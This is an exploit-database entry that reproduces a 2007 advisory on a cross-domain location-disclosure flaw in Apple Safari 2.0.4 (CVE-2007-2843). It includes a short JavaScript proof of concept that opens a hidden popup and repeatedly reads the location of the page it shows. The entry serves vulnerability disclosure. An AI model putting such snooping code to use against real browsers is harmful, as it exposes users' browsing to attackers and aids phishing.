Apple Safari 2.0.4 - Cross-Domain Browser Location Information Disclosure Vulnerability

2007-05-23T00:00:00
ID EDB-ID:30078
Type exploitdb
Reporter Gareth Heyes
Modified 2007-05-23T00:00:00

Description

Apple Safari 2.0.4 Cross-Domain Browser Location Information Disclosure Vulnerability. CVE-2007-2843. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/24121/info

Apple Safari is prone to an information-disclosure vulnerability because it fails to properly enforce cross-domain JavaScript restrictions.

Exploiting this issue may allow attackers to access locations that a user visits, even if it's in a different domain than the attacker's site. The most common manifestation of this condition would typically be in blogs or forums. Attackers may be able to access potentially sensitive information that would aid in phishing attacks.

This issue affects Safari 2.0.4; other versions may also be affected. 

var snoopWin;

function run() {
	snoopWin = window.open('http://www.google.com/','snoopWindow','width=640,height=480');
	snoopWin.blur();
	setTimeout("snoopy()", 5000);	
}

function snoopy() {
	alert(snoopWin.location);
	setTimeout("snoopy()", 5000);
}